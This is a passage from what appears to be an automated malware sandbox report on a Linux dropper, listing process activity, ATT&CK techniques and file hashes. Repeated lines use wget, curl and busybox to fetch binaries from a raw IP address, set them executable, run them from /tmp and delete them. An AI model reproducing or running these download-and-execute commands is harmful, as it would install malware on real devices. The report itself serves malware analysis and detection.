- Reads runtime system information
- Writes file to tmp directory
PID:889
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:891
-
-
/bin/chmodchmod 777 AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB./AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm AYLn2q2CgjzBSPOD9aqCf94vnDlRNyxOcB2⤵PID:895
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:896
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:898
-
-
/bin/chmodchmod 777 fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- File and Directory Permissions Modification
PID:899
-
-
/tmp/fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a./fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵
- Executes dropped EXE
PID:900
-
-
/bin/rmrm fpfbLiBINuzbSt6iNP7rNl8BIrha5Nnf4a2⤵PID:901
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:902
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:903
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:904
-
-
/bin/chmodchmod 777 K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ./K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵
- Executes dropped EXE
PID:906
-
-
/bin/rmrm K3OvyAXi2AX7GGB1luZhs0fAHO2tE0fvvZ2⤵PID:907
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:908
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:909
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:910
-
-
/bin/chmodchmod 777 WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- File and Directory Permissions Modification
PID:911
-
-
/tmp/WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo./WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵
- Executes dropped EXE
PID:912
-
-
/bin/rmrm WJM1zbTuQTXsLvHIKxDkKJpVVww7GutySo2⤵PID:913
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:914
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:915
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:918
-
-
/bin/chmodchmod 777 DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R./DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm DDu9UIKlCvEiHKfnCkye1hBbSYtNV9943R2⤵PID:921
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/eAFO1gk8TXpsonsPGmihNbtQqMnHJgY6y52⤵PID:922
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97